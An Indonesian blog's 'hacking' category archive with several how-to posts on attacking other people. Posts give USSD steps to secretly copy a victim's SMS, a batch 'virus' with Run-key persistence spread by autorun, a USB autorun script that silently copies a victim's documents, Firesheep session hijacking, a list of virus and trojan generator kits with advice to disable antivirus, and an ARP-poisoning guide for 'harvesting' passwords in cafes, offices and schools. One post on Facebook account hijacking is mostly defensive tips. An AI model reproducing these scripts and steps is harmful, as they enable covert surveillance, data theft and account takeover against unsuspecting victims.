RSS

Arsip Kategori: hacking

Sadap SMS di Handphone Biasa

Sekarang sudah ada cara sadap/mengalihkan panggilan, sms, telepon, pembicaraan private bahkan BBM juga bisa disadap. Kalau kamu ingin tahu cara menyadap dengan cara mudah, kamu cukup punya handphone biasa saja. Dengan handphone biasa ini, kamu dapat menyadap sms orang lain tanpa aplikasi apa pun yang diinstal. Langsung saja, saya berbagi trik sadap sms dengan menggunakan trik operator selular.

Bagi kamu para pengguna operator selular XL, kamu sangat beruntung. Karena dengan menggunakan operator ini, kamu dapat melakukan penyadapan secara sederhana. Dan kamu dapat membaca petunjuk berikut ini.
1. Siapkan gadget orang yang ingin kamu sadap. ( Agak dirayu dikit untuk mendapatkan gadgetnya )
2. Ketik *123*571# di gadget korban, lalu kamu tekan CALL.
3. Setelah itu kamu akan mendapat beberapa pilihan, jadi kamu pilih no 2 ( Layanan Lain )
4. Dari pilihan tadi, akan muncul 2 pilihan baru, yaitu :
  • AUTO FORWARD => Menerima SMS orang lain langsung tanpa masuk ke no HP korban.
  • AUTO COPY => Menerima SMS orang lain yang masuk ke no HP korban dan juga ke no HP kamu sendiri.
5. Setelah itu, kamu pilih yang AUTO COPY, agar kamu dapat mengetahui lebih detail lagi tanpa ketahuan. Dan kemudian, kamu tungggu konfirmasi dari operator XL untuk pemotongan biaya ( 1000/ bulan )
6. Lalu kamu mengirim sms dari HP korban dengan format : COPY ON lalu kirim ke no HP kamu. Maka proses sadap SMS sudah berhasil.
OK, Selamat mencoba.
Iklan
 
Tinggalkan komentar

Ditulis oleh pada 28 Juli 2012 in hacking, News

 

cara buat virus sederhana dari notepad

ini virus efeknya tidak t’lalu berbahaya….efek dari virus ini cuma mengganti tampilan dari
windows…..tapi cukup bikin kaget juga!!! 😀 😀 tapi yg penting gak ke-detect ama anti virus(setahu saya….. ❓ ❓ )

note: “HANYA BEKERJA PADA WINDOWS XP” :

caranya:
– buka notepad lalu tulis(atau copy paste…tapi di edit dulu yaaa) script di bawah ini:

@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f

– lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)
– buat Autorun.inf dengan script:

[autorun]
open=nama_file.bat

– lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)
– file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY
– copy file-file tsb ke CD
– nikmati efeknya

note:
– jangan disalahgunakan
– maaf kalau pernah diposting
– maaf lagi kalau salah tempat untuk posting,….maklum member baru and masih amatir 😳 ….
– lagi-lagi maaf kalau ada yang salah, and mohon dikoreksi 😳 ….
– kalau mau buat anti virusnya tinggal di modifikasi nilainya….

 
2 Komentar

Ditulis oleh pada 12 Februari 2011 in hacking

 

Cara penggunaan Firesheep

Firesheep merupakan add-on firefox yang bisa digunakan untuk hacking facebook. Firesheep ini buatan Eric Butler, seorang freelance web aplikasi dan pengembang perangkat lunak. Sebenarnya firesheep ini bertujuan untuk mengantisipasi kurangnya keamanan user login dan cookie pada web-web populer seperti facebook. Sebenarnya Firesheep bukan hanya digunakan untuk facebook saja tapi banyak website populer lainnya seperti cookies dari Amazon.com, Basecamp, bit.ly, Cisco, CNET, Dropbox, Enom, Evernote, Flickr, Github, Google, HackerNews, Harvest, Windows Live, NY Times, Pivotal Tracker, Slicehost, tumblr, Twitter, WordPress, Yahoo, Yelp

Firesheep ini merupakan software opensource yang bisa anda download di http://codebutler.github.com/firesheep/ dan jangan lupa bagi anda pengguna windows untuk memasang winpcap terlebih dahulu. Setelah anda mendownload dan menginstall firesheep dan anda sedang berselancar ria di jaringan wifi yang gratis misalnya di cafe. maka akan muncul sebuah sidebar baru yang menampilkan user-user yang sedang login ke sebuah web sebagai contoh adalah Facebook. Jika pengguna wifi ada yang login ke facebook dan tampil di sidebar anda, maka anda hanya butuh mengklik 2 kali dan anda sekarang bisa login sebagai dia tanpa harus memasukkan username dan password lagi

atau langsung saja lihat video ini !

atau anda juga bisa langsung download di website ini

tapi jangan di salah gunakan ..

selamat mencoba..

 
2 Komentar

Ditulis oleh pada 12 Februari 2011 in hacking

 

Teknik Membajak Account FB dan pencegahannya

Teknik yang terungkap untuk menyerang akun facebook beberapa waktu lalu adalah dengan membanjiri data pada server facebook dengan teknik DDOS atau biasa dikenal dengan Distributed Denial of Service sehingga server lumpuh selama beberapa jam seperti yang terjadi pada facebook dan twitter tahun 2009 oleh cracker dari Rusia. Kemungkinan seperti ini perlu kita waspadai.


Keylogger

Cara pertama menggunakan keylogger adalah cara yang sangat efektif bagi para cracker untuk mencuri password dari akun facebook anda. Dengan menginstall software dan atau hardware keylogger pada notebook maupun PC sasaran, maka otomatis segala bentuk ketukan pada keyboard maupun aktivitas browsing anda akan terekam dengan detail dan sistematis.

Sehingga jika anda mengetikan password dan username pada notebook atau PC yang telah dipasangi keylogger, anda dengan penuh kerelaan hati telah menyerahkan data pribadi sensitif tersebut pada orang yang memasangnya, karena keylogger ibarat kertas karbon yang akan membuat salinan tentang sesuatu yang ditulis diatasnya.

Keylogger biasanya dipasang oleh cracker pada terminal akses internet publik yang berbagi pakai seperti di warnet dan kampus. Maka berhati-hatilah ketika menggunakan akses seperti ini.

  1. Pertama, jangan langsung menggunakan terminal melainkan lakukan restart.
  2. Kedua, coba cek apakah ada aplikasi tersembunyi yang berjalan di memori background, anda bisa gunakan tools event task manager (tekan tombol ctrl + alt + del pada desktop windows anda) dan perhatikan apakah ada aplikasi atau proses yang tidak biasa? Memang anda perlu sedikit belajar dan membiasakan hal ini demi keamanan anda sendiri.
  3. Ketiga, cek setting keamanan pada browser yang anda gunakan apakah secara otomatis merekam username dan password? Sebaiknya matikan fitur ini dan apabila ada fitur anti phising site bisa diaktifkan.
  4. Keempat, bersihkan/hapus cache dan history secara otomatis setiap kali menutup browser. Ini bisa anda lakukan pada setting browser.
  5. Kelima, pastikan bahwa setiap selesai melakukan kegiatan anda selalu log out dengan sempurna.

Sniffing

Teknik kedua adalah dengan menggunakan tools yang biasa digunakan sniffing seperti Cain and Abel pada area yang terkoneksi WiFi jadi tools tersebut memang “mencari aktifitas” pada laptop-laptop yang terkoneksi. Maka anda harus berhati-hati juga apabila sedang mobile dan mengakses HotSpot.

Pada prinsipnya akses wireless sangat mudah untuk diintip. Jangan begitu saja mempercayai SSID “Free WiFi atau Free HotSpot” saat anda scanning wireless network. Yang paling aman adalah bertanya pada pengelola HotSpot area tersebut apa SSID yang resmi? Kemudian setting akses wireless pada notebook anda untuk tidak “auto connect” melainkan harus manual agar anda bisa meneliti terlebih dahulu.

Ketika anda melakukan akses dari jaringan WiFi HotSpot sebaiknya hindarkan transaksi pada situs yang kritis seperti e-banking, akses email, akun jejaring sosial dlsb. Browsing hal yang umum saja kecuali anda yakin benar bahwa tidak ada yang berusaha mengintip aktivitas anda dan jaringan tersebut bisa dipercaya.

Meskipun demikian, pastikan bahwa anda selalu akses dengan memilih mode secure connection yaitu menggunakan HTTPS yang biasanya ditandai dengan munculnya icon gembok terkunci pada browser anda. Dengan akses HTTPS ini maka antara anda dengan server layanan yang diakses telah dilindungi dengan enkripsi sehingga tidak mudah diintip oleh orang yang tidak berhak. Pastikan anda sudah masuk ke mode secure sebelum memasukkan username dan password atau PIN.

Social Engineering

Sekarang ini mulai banyak korban berjatuhan akibat upaya pembajakan akun facebook yang menggunakan teknik social engineering. Terutama memanfaatkan kelemahan prosedur akun email gratisan seperti Yahoo! Mail.

Seseorang atau cracker bisa berpura-pura menjadi Anda dan mencoba mendapatkan akses tidak sah dan membajak akun email Anda. Caranya dengan mengikuti prosedur kehilangan password.

Biasanya layanan email gratisan akan menanyakan beberapa kata kunci untuk konfirmasi seperti kombinasi “di mana tempat bulan madu Anda?” atau “siapa nama hewan peliharaan Anda yang pertama” atau “siapa nama paman atau tante yang jadi favorit Anda?”. Jawaban atau kata kunci dari pertanyaan konfirmasi seperti ini dulu pernah Anda isikan ketika pertama kali mendaftarkan akun email tersebut.

Sekarang melalui facebook, seseorang atau cracker bisa dengan mudah mengelabui Anda. Dia akan berpura-pura melamar sebagai teman Anda. Kemudian mencari tahu alamat email Anda.

Ketika dia mengetahui bahwa Anda menggunakan alamat email gratisan, maka mulailah dia mengajak Anda berkomunikasi. Dengan cara tertentu dia akan mengkorek sejumlah informasi yang seharusnya Anda rahasiakan.

Begitu Anda memberikan informasi yang diperlukan untuk mengakses prosedur kehilangan password di layanan akun email gratisan, maka si cracker akan menguasai akun email Anda. Selanjutnya dia akan melakukan prosedur yang sama kepada akun facebook Anda, yaitu pura-pura lupa password dan mencoba membajaknya.

Facebook biasanya akan mengirimkan email “password sementara” ke alamat email utama Anda yang sialnya sudah dikuasai oleh si cracker. Sehingga dengan mudah dia menguasai akun facebook Anda juga. Begitu dia mengganti password akun facebook Anda, maka selanjutnya Anda akan ditolak untuk mengakses aku facebook Anda sendiri.

Seorang cracker yang membajak akun facebook Anda biasanya akan memanfaatkannya untuk beberapa tujuan jahat. Yang pertama adalah untuk melakukan impersonating atau pemalsuan identitas dengan maksud untuk memfitnah, menjelek-jelekkan dan menjatuhkan martabat Anda sebagai pemilik akun yang sesungguhnya. Misalnya dia menyerang dan melakukan suatu tindakan yang tidak disukai teman-teman Anda sehingga di dunia nyata, semua orang menjadi memusuhi Anda tanpa Anda sadari.

Yang kedua adalah untuk menipu teman-teman Anda. Telah banyak laporan di luar negeri maupun juga di Indonesia, bahwa sejumlah orang dimintai tolong oleh teman lamanya di facebook untuk mengirimkan sejumlah uang karena beberapa alasan, yang klasik adalah mengaku kecopetan atau kerampokan atau di akhir pekan tidak bisa mengambil uang untuk pengobatan dsb. Atau mengajak bertransaksi sesuatu tapi sebenarnya akun facebook itu telah dibajak oleh orang lain.

Tips Pencegahan

  1. Jangan mudah menerima permintaan pertemanan dari orang yang sama sekali belum Anda kenal, terutama yang tidak memiliki mutual friend.
  2. Anda selalu memiliki kesempatan untuk melakukan konfirmasi kepada teman yang ada di dalam mutual friend seseorang yang mencoba meminta pertemanan pada Anda. Sebab memang itulah salah satu gunanya facebook menampilkan informasi mutual friend yaitu agar Anda bisa melakukan verifikasi terlebih dahulu. Apabila teman Anda mereferensikan dan mengkonfirmasi keabsahan calon teman tersebut baru “lamaran” tersebut bisa dipertimbangkan untuk diterima.
  3. Cara lain untuk mengkonfirmasi suatu permintaan pertemanan adalah mengirimkan message kepada yang bersangkutan. Dengan komunikasi ini Anda dapat menanyakan siapakah dia sebenarnya (seringkali nama akun yang ditampilkan adalah julukan atau nama alias yang tidak membantu Anda untuk mengingat siapakah calon teman itu) dan melakukan konfirmasi lainnya yang diperlukan. Misalnya, melakukan komunikasi off line (telepon) atau pertemuan on line web cam atau bahkan off line adalah cara lain untuk melakukan konfirmasi keabsahan calon teman.
  4. Jangan terburu-buru dan berhati-hati dalam menyampaikan sejumlah informasi pribadi yang sekilas nampaknya tidak penting tetapi ternyata merupakan kunci untuk membobol akun email Anda. Pertanyaan yang sepertinya menunjukkan antusiasme pada satu hal yang sama (binatang kesayangan, tempat wisata favorite, cerita tentang keluarga, memasang album foto event tertentu dlsb.) tanpa sengaja bisa memaparkan informasi pribadi yang seharusnya Anda rahasiakan.
  5. Anda mungkin tanpa sadar telah memaparkan informasi yang seharusnya rahasia itu dalam profile Anda. Atau dalam words caption di album foto Anda. Misalnya menulis nama binatang kesayangan Anda persis di bawah fotonya bahkan ada orang yang secara khusus membuatkan akun facebook untuk binatang kesayangannya lengkap dengan semua profilenya. Atau memasang foto dan menyebut lokasi bulan madu dan atau memberikan tagging pada foto keluarga (termasuk paman yang menjadi favorite Anda) dlsb. Beragam ketidaksengajaan semacam itu.
  6. Berhati-hati dan pikirkanlah berkali-kali kemungkinan manfaat dan kerugiannya bila Anda harus menampilkan informasi pribadi di halaman info akun facebook Anda. Anda punya pilihan untuk tidak menuliskan informasi itu, misalnya binatang kesayangan, toh sebenarnya apabila ada yang ingin tahu, bisa menanyakannya secara pribadi melalui fasilitas message langsung kepada Anda. Anda juga bisa memilih setting untuk membatasi akses orang lain ke informasi tertentu di akun facebook Anda. Misalnya Anda bisa menyembunyikan alamat email. Manfaatkan fitur setting pengamanan akun facebook ini semaksimal mungkin dan pikirkanlah.
  7. Sebisa mungkin dan jikalau memungkinkan hindari menggunakan layanan email tak berbayar untuk akun facebook Anda. Gunakanlah akun email lokal misalnya yang diberikan oleh kantor Anda (kalau diijinkan untuk pribadi), menyewa akun email ke ISP (sebenarnya harganya murah atau bahkan gratis apabila Anda menjadi pelanggan ISP tersebut) atau Anda membuat domain pribadi sendiri dan meminta tolong layanan jasa hosting untuk membuatkan, apabila Anda tidak memiliki keterampilan teknis sendiri. Intinya, akun email lokal atau milik sendiri lebih aman dari teknik serangan social engineering ini terutama karena prosedur untuk konfirmasi kehilangan password atau bila terjadi compromise biasanya dilakukan secara manual dengan teknik identifikasi off line bukan by system yang otomatis tapi menggunakan algoritma pengamanan yang terlalu sederhana seperti layanan email gratisan.
  8. Selalu tambahkan alamat email sekunder pada akun facebook Anda dan juga pada akun email gratisan yang Anda gunakan apabila memang terpaksa tidak ada pilihan selain harus menggunakan layanan tersebut. Sembunyikan atau jangan pernah Anda tunjukkan kepada siapapun dengan alasan apapun alamat email sekunder Anda itu. Dan secara periodik ubahlah semua password Anda sesuai anjuran pengamanan seperti menggunakan kombinasi huruf, angka dan karakter khusus serta panjang password minimal 6 atau 8 karakter yang sulit ditebak orang lain dan bila sulit menghapalnya jangan simpan catatannya di tempat yang mudah diketahui. Atau gunakan fasilitas aplikasi password management untuk membantu Anda. Ada banyak yang gratis.
  9. Meskipun tidak lazim, namun demi untuk keamanan, backuplah data friend list Anda. Informasi penting seperti nama profile accountnya, url halaman facebooknya, alamat email dan juga telepon (kalau ada). Sehingga apabila terjadi sesuatu Anda bisa segera memberikan peringatan, misalnya melalui email dan akan berguna apabila kelak Anda membuka akun facebook yang baru dan terpaksa harus memasukkan satu per satu lagi friend list Anda tersebut. Backup memang sedikit merepotkan namun penting.
  10. Apabila Anda terlanjur menjadi korban pembajakan akun facebook maka Anda dapat melakukan 4 hal.
    1. Pertama, peringatkan semua orang bahwa akun Anda telah dibajak. Upaya ini bisa Anda lakukan lewat berbagai saluran seperti email, telepon, milis, chat, blog dlsb. Demi untuk mencegah orang lain, teman, famili Anda yang ada di friend list menjadi korban misalnya penipuan.
    2. Kedua, patut secepatnya (Anda berlomba dengan si pembajak sebelum dia mengganti alamat email utama dan sekunder Anda) mencoba untuk mendapatkan kembali akun Anda melalui prosedur lupa atau kehilangan password. Apabila berhasil, segera ganti alamat email Anda dan passwordnya dan sembunyikan jangan ditampilkan dengan mengubah setting keamanan akun Anda. Jangan buru-buru log out untuk mencegah si pembajak mencoba mengambil alih juga. Dan jangan log out sampai Anda berhasil mengganti alamat email utama dan sekunder Anda serta mengisi password yang baru sekaligus menerapkan setting pengamanan yang lebih tertutup (melindungi/menyembunyikan alamat email Anda).
    3. Ketiga, melaporkan kepada tim keamanan facebook bahwa akun Anda telah dibajak, alamatnya adalah: http://www.facebook.com/help/?page=1023 atau apabila link tersebut telah berubah Anda dapat mencarinya di halaman HELP. Anda akan diminta mengisi form dan selanjutnya akan ada korespondensi dengan tim keamanan facebook yang akan berusaha mengkonfirmasi kebenaran laporan Anda dan apabila semua berjalan dengan baik, mungkin akun Anda dapat dikembalikan. Namun pastikan bahwa sebelum melaporkan, Anda sudah memiliki alamat email yang baru dan aman.
    4. Yang keempat, apabila semua upaya mengembalikan akun Anda gagal, maka segeralah membuka akun facebook baru, amankan informasinya agar tidak dibajak orang lagi dan add semua teman Anda (semoga Anda melakukan back up). Kemudian bersama-sama ajaklah mereka semuanya untuk melaporkan akun lama Anda yang dibajak tsb. Sebagai akun yang melakukan abuse, fraud, compromise dan impersonating sehingga nanti akan ditutup atau diblokir oleh facebook.
  11. Yang terakhir jangan gunakan alamat email, username dan password yang sama untuk semua layanan online yang Anda ikuti. Selalu update pengetahuan Anda mengenai isu keamanan layanan jejaring sosial dan senantiasa waspada ketika aktif di dunia maya.
 
Tinggalkan komentar

Ditulis oleh pada 5 Februari 2011 in hacking

 

Merampok data dengan USB flash drive

kita akan mencoba Merampok data yg ada di komputer teman ato siapapun dengan menggunakan USB Flashdisk….. caranya bagaimana????

nah… gini caranya :

  1. Buka notepad pertama . .. kalau males ngetik bisa copas tulisan di bawah ini ..

@echo off

REM Name : silentxxx

REM Author : Silentxxx

Set silent=%computername% _ %random%

If not exist ”%silent%” Md “%silent%”

For%%a in (C D E F G H I J) do if exist %%a:\ (

For /f “tokens=*” %%b in (‘dir /a/b/s %%a:\*.doc’) do (

attrib –s –h –r “%%b”

copy “%%b” “%silent%” /y)

For /f “tokens=*” %%b in (‘dir /a/b/s%%a:\.xls’) do (

attrib –s –h –r “%%b”

copy “%%b” “%silent%” /y)

For /f “tokens=*” %% b in (‘dir /a/b/s%%a:/*.txt’) do (

attrib –s –h –r “%%b”

copy “%%b” “%silent%” /y)

For /f “tokens=*” %%b in (‘dir /a/b/s%%a:/*.docx’) do (

attrib –s –h –r “%%b”

copy “%%b” “%silent%” /y)

)

  1. Save file tersebut dengan nama terserah .bat dan save as type all files .,udah pa blon??

Sekarang coba di jalankan file dengan exstensi bat tersebut maka di samping File akan terbuat semua file yang di copy dari drive C ampai Z (kalau punya )wkwkwk. gila banyak amat..

Code di atas dapat di ubah atau di tambah sesuai dengan keinginan kalian masing-masing bisa di tambahkan kode

For /f “tokens=*” %%b in (‘dir /a/b/s%%a:\*.zip’) do(

attrib –s –h –r “%%b”

copy “%%b” “%silent%” /y)

maka file yang berextensi zip akan masuk ke Flash Disk kamu (wah lumayan dapat software kompresan gratis wkwkwk)

ubah sesuai extensi apa yang kamu inginkan misalnya *.pdf atau *.html

maka file terserah.bat akan berjalan sesuai dengan keinginan anda .

File tersebut bisa anda ubah ke bentuk extensi exe. .. enak atuh,, lebih mudah.. dengan software Bat_To_Exe_ConverterV1.5 kalau belum punya kakak-kakak bisa download di http://www/brothersoft.com/bat-to-exe-converter-50301.html

Cara mengubahnya adalah

  1. Buka software tersebut..
  2. Pilih yang compile
  3. Dan sekarang file.bat yang tadi kita buat menjadi file yang berextensi *.exe lebih enak kan ..
  4. Agar file tersebut maka kita harus buat file autorun
  5. Buka notepad ketikkan

[autorun]

Open=terserah.exe

  1. save as dengan nama Autorun.inf dan terserah.exe di dalam directory USB Flash Drive kamu..
  2. Selesai .. Akhirnya sekarang colokkan atau masukkan FD kamu atau loe atau agan di pc mana aaja akan terkcopy banyak data yang kamu terima .. .. smoga berguna

credit : http://mathin-tkj.blogspot.com

 
2 Komentar

Ditulis oleh pada 5 Februari 2011 in hacking

 

Tols untuk membuat virus dengan cepat dan mudah

Hmmm….. ngomong2 virus, pasti berhubungan dengan bahasa pemrograman, biasanya pembuatan virus menggunakan bahasa pemrograman Visual Basic ato byasa d sebut VB…
Nah, jadi kalo kalian pengen bikin virus, harus bisa bahasa pemrograman… Seperti yang kita ketahui jika ingin mempelajari bahasa pemrograman, kita tidak akan bisa dengan cepat menguasainya….

Tapi tenang… buat kalian yang pengen jahil2an bikin virus, ada banyak software di internet yg bisa digunakan untuk membuat virus hanya dengan cara klik dan klik… sangat gampang sekali memang… hmm.. gak usah panjang2 ya cz saya mau siap2 bwat bka puasa neeh… hhehe.. langsung aza lah dibawah ini ada banyak link yg bisa kalian buka untuk mendownload secara gratis alias free berbagai macam virus generator, Check This Out :

Access Macro Generator
Acid Flowing Trojan Generator
Advanced Batch Mutator
Advanced Steam Trojan Generator
Alchemic Life Generator
ANSI Bomb Constructor by Duke
The ANSI Bomb Generator
Ansi Bomb Kit
Ansi Bomb Maker
Apokalipses
BAT Poly Generator
Batch Encrypt
Batch Maker
Batch Trojan Generator
Batch Virus Construction Kit
Batch Worm Generator
Batch-O-Matic
Bayros Virus Creation Kit
Bio Hazard Worm Generator
Biological Warefare Virus Creation Kit
BOOM: AnsiBomb Construction Kit
Boot Trojan Generator
Bubble Chamber
Byte Virus Generator
C++ Worm Generator
CcT’s Malware Construction Kit
China Town Macro Word Virus Construction Kit
Class Macro Kit
Class.Poppy Construction Kit
CM’s Batch Virus Generator
Code Pervertor
CompVCK
CVEX Virus Maker
The Czybik Gen Creation Kit
Dangerous Menu
Dark Slick’s Virus Creator
Dav’s Delphi Worm Generator
Dav’s Media Files Worm Kit
Dav’s Virus Builder
Deinonychus Virus Generator
Delphi Batch Virus Kit
Digital Hackers’ Alliance Randomized Encryption Generator
The Ding Lik’s Millenium C Virus Generator
Dirty Nazi Virus Generator
Duke’s Pascal Overwriting Generator
Duke’s Pascal Virus Generator
Duke’s Simple Virus Cloner Tool
Easy ANSI Bomb Creator
Ejecutor Virus Creator
El-Trucha’s Virus Maker
Elektronny Pisatel Virusow
Evil Tool
The Fabulous Jany Batch Vir Gen
Falckon Encrypter
FETIOP
G2 Virus Generator
GenVirus
The German Virus Construction Kit
Gildo Backdoor Generator
Hell P2P Worm Generator
Hutley’s mIRC BackdooR Generator
Immortal EAS Virus Creation Centre
The Incredible Batch Bug Maker
Indonesian Virus Source Creator
Indra VBS Worm Construction Kit
Instant Virus Production Kit
Java Script Dav Kit
Javascript Encrypter
JavaScript Generator
JPS Virus Maker
Kagra VBS Worm Generator
Kefi’s HLLP Construction Kit
Kefi’s HTML Virus Construction Kit
Kefi’s P2P Worm Generator
Kids Worm Generator
Kuzja Generator
LAB v1.4 Lädt den X-14 Virus in eine Datei
Laboratorio de virus
LineZer0 Macro Engine
Looper Generator
Lord Of Navan’s Invasion Generator
MacrEngine
The Macro Access Kit
Macro Virus Development Kit
Make Your Instant VBS Worm Engine
Mass Destruction Library
Mass O Shit Code Generator
Metric Buttload of Code Generator
Microsoft Macro Virus Generator
Microsoft Visual Basic Script Worm Editor
Mini Ultras Construction Kit
Mister Spock – Virusgenerator Version
MPCGEN Mass Code Generator
MSH Virus Kit
Necronomikons M$ Auto CAD 2002 Virus Maker
Necronomikons Terror Virus Construction Kit
Necronomikons Windoze Worm Factory
Necronomikons Word2K Classvirus Construction Kit
Necronomikons WordXP Macrovirus Generator
NEUROiD Word Macro Virus Generator
Newborn Worm Generator
Next Generation Virus Construktion Kit
Nightmare Joker Word Macro Virus Construction Kit
Nowhere Utilities
NuKE’s Randomic Life Generator
Odysseus Macro Virus Construction Kit
Overwritting Virus Construction Toolkit
P0ke’s Worm Generator
PetiK Script Worm and Virus Generator
Phalcon/Skism Mass-Produced Code Generator
Powerpoint Macro Generator
Psychologic Script Poly Engine
Psychologic VBS Poly Generator
Purgatory Companion Virus Kit
A Quick & Easy Trojan Developing System
Rajaats Recursive Random Assembler Code Creator
Random Batch Trojan Generator
Random Silly Batch Generator
Razorblade’s Batch Virus Generator
Satan’s Apocalypse Virus Generator
Satanic Brain Virus Tool’s
Senna Spy Internet Worm Generator 2000
Senna Spy One EXE MAker
Senna Spy Trojan Generator
Setman
sevenC BatcH Generator
sevenC Polymorph VBS Generator
The Shinny Batch Trojan Generator
SHVK: Simple HTML Virus Kit
SiCem Virus Creation Labs
Simple and Fast Html Virus Maker
Simple Batch Virus Maker
Simple Chr Encrypter
Simple Script Wormer
Simple Strreverse Encrypter
Simple Win32ASM Overwriter Generator
The Simple WinScript Virus Kit
Skype Worm Generator
The SMEG Virus construction kit
SpaMaCidAL trojan batch file creator
Sucke MiRc Worm Generator
The Super Appending Batch VCK
TAPiON Polymorphic Decryptor Generator
Toxic CV
The Trojan Generator
The Trojan Horse Construction Kit
TSCMK: The Simple Class Macro Kit
TSR Time Bomb Creator
TVBSG Visual Basic Script worm generator
TVBVK: The Visual Basic Virus Kit
Tvorets Chervey
Uber Worm Generator
Ultras Construction Kit for Word
VBS Encryptor
VBS Phirus Constructor
VBS Worm Generator
VCL32
VDX Batch Generator
Viral Matrix
Virus Construction Set
Virus Creation 2000
Virus Creation Lab
Virus Creator 2000
Virus Development Kit
Virus Factory mit Code – Tabelle
A virus generator
Virus Lab Creations
Virus Laboratory for DOS
Virus Researcher’s Toolkit
The Virus Wizard
Visual Basic Worm Generator
The WalruS Macro Virus Engine
The WalruS Macro Virus Generator
Wavefunc’s Goofy Batch Virus Generator v1.1c
WG Batch n’ Script
Windows Scripting Host Worm Constructor
Windows Virus Creation Kit
WMF Maker
Wonesek VBS Joiner
Word97 Macro Virii Construction Kit
Worm IRC Script Kit
WVSG: Word97 VBA SR1 Generator
XVGL
Ye Olde Funky Virus Generator
Zed’s Word Macro Virus Constructor

Nah tinggal kalian download aja… n kalo mo pake, jangan lupa matiin dulu antivirusnya…
selamat mencoba….. n jangan dipake wat kejahatan ya… cum wat iseng isengan aza… hehehe

 
Tinggalkan komentar

Ditulis oleh pada 5 Februari 2011 in hacking

 

Hacking LAN + Sniffing

Bagaimana hasilnya jika cara ini di gunakan di warnet2, or di kantor, or di sekolah, anda bisa panen password and account. Password and account tersebut anda dapatkan dari orang2 yang terhubung ke jaringan internet dan 1 network (LAN)

Cara ini masih dapat digunakan karena sebagian besar jaringan meggunakan jaringan hub & switch yang tidak terenkripsi. Mengapa tidak terenkripsi?

* Network Admin sebagian besar adalah orang IT yang specialist dalam membuat program, bukan dalam Network Security
* Bila dienkripsi bandwidth yang dibutuhkan akan meningkat dan tentu inet yang sudah lemot ini akan semakin lemot dan akhirnya page error
* Harganya tidak murah untuk memperoleh yang terenkripsi

Perbedaan antara jaringan Hub dan Switch:

* Pada jaringan hub semua data yang mengalir di jaringan dapat dilihat/diambil oleh komputer manapun yang ada di jaringan asalakan komputer tersebut merequest data tersebut, kalo tidak direquest ya tidak akan datang.
* Pada jaringan switch hanya komputer yang melakukan pertukaran data yang dapat melihat data tersebut, komputer2 lain tidak berhak merequest data tersebut.

Masalahnya adalah harga dari router hub dan switch tidak berbeda jauh sehingga kebanyakan tempat sekarang sudah menggunakan metode switch yang menyulitkan untuk network hacking.

Hacking ini menggunakan teknik:

* Sniffing
* ARP Poison Routing

Kedua Teknik di atas tidak akan bisa dicegah oleh firewall apapun di komputer korban, dijamin.

Important Note: ARP Poison Routing dapat meyebabkan denial of service (dos) pada salah satu / semua komputer pada network anda

Kelebihan:

* Tidak akan terdeteksi oleh firewall tipe dan seri apapun karena kelemahannya terletak pada sistem jaringan bukan pada komputernya
* Bisa mencuri semua jenis login password yang melalui server HTTP
* Bisa mencuri semua login password orang yang ada di jaringan Hub selama program diaktifkan
* Untuk ARP Poisoning bisa digunakan untuk mencuri password di HTTPS
* Semua programnya free

Kekurangan:

* Untuk jaringan Switch harus di ARP poisoning 1 persatu dan bandwidth anda akan termakan banyak untuk hal itu (kalo inet super cepat ga masalah)
* Ketahuan / tidak oleh admin jaringan di luar tanggung jawab saya

Mulai dari sini anggap bahwa di network dalam kisah ini ada 3 komputer, yaitu:

* Komputer Korban
* Komputer Hacker
* Server

Perbedaan-perbedaan antara jaringan switch dan jaringan hub:
Langkah-langkah pertama:

1. Cek tipe jaringan anda, anda ada di jaringan switch / hub. Jika anda berada di jaringan hub bersyukurlah karena proses hacking anda akan jauh lebih mudah.
2. Download program-program yang dibutuhkan yaitu Wireshark dan Cain&Abel.
Code:

http://www.wireshark.org/download.html
http://www.oxid.it/cain.html

Cara Menggunakan WireShark:

* Jalankan program wireshark
* Tekan tombol Ctrl+k (klik capture lalu option)
* Pastikan isi pada Interfacenya adalah Ethernet Card anda yang menuju ke jaringan, bila bukan ganti dan pastikan pula bahwa “Capture packets in promiscuous mode” on
* Klik tombol start
* Klik tombol stop setelah anda merasa yakin bahwa ada password yang masuk selama anda menekan tombol start
* Anda bisa melihat semua jenis packet yang masuk dan keluar di jaringan (atau pada komputer anda saja jika network anda menggunakan Swtich
